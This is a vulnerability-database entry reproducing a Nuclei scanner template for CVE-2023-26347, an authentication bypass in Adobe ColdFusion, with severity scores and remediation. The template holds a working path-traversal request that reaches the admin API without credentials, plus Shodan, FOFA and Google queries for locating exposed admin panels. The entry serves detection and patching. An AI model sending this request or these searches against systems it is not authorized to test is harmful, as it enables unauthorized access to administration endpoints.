Lucene search
ProjectDiscoveryNUCLEI:CVE-2023-26347HistoryNov 23, 2023 - 11:53 a.m.
Adobe Coldfusion - Authentication Bypass
2023-11-2311:53:05
ProjectDiscovery
github.com
40
cve2023
adobe
coldfusion
authentication
bypass
vulnerability
unauthenticated
administration.
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
7.5 High
AI Score
Confidence
High
0.003 Low
EPSS
Percentile
70.5%
Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An unauthenticated attacker could leverage this vulnerability to access the administration CFM and CFC endpoints. Exploitation of this issue does not require user interaction.
id: CVE-2023-26347
info:
name: Adobe Coldfusion - Authentication Bypass
author: salts
severity: high
description: |
Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An unauthenticated attacker could leverage this vulnerability to access the administration CFM and CFC endpoints. Exploitation of this issue does not require user interaction.
remediation: |
Update to the latest version of Adobe Coldfusion
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-26347
- https://helpx.adobe.com/security/products/coldfusion/apsb23-52.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-26347
cwe-id: CWE-284
epss-score: 0.00415
epss-percentile: 0.73972
cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: adobe
product: coldfusion
shodan-query:
- http.component:"Adobe ColdFusion"
- http.component:"adobe coldfusion"
- http.title:"coldfusion administrator login"
- cpe:"cpe:2.3:a:adobe:coldfusion"
fofa-query:
- app="Adobe-ColdFusion"
- app="adobe-coldfusion"
- title="coldfusion administrator login"
google-query: intitle:"coldfusion administrator login"
tags: cve2023,cve,adobe,coldfusion,auth-bypass
http:
- raw:
- |
GET /hax/..CFIDE/adminapi/administrator.cfc?method=getBuildNumber&_cfclient=true HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'wddxPacket version='
- '<string>'
condition: and
- type: status
status:
- 200
# digest: 4a0a004730450220369c99422e48defa25ecfd647f147650291c7119a47e0dc1e6ac7c604b326479022100aaaa20e9ba989242707c217de18b6debae9bb920d91261d03bf56e876020091e:922c64590222798bb761d5b6d8e72950Related
prion
prion
Improper access control
2023-11-17 14:15:00
cnvd
cnvd
Adobe ColdFusion Access Control Error Vulnerability
2023-11-21 00:00:00
nvd
nvd
CVE-2023-26347
2023-11-17 14:15:20
cvelist
cvelist
CVE-2023-26347 CVE-2023-38205 issues | ColdFusion Admin Panel Access
2023-11-17 13:31:33
cve
cve
CVE-2023-26347
2023-11-17 14:15:20
adobe
adobe
APSB23-52 : Security update available for Adobe ColdFusion
2023-11-14 00:00:00
nessus
nessus
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
7.5 High
AI Score
Confidence
High
0.003 Low
EPSS
Percentile
70.5%
Related for NUCLEI:CVE-2023-26347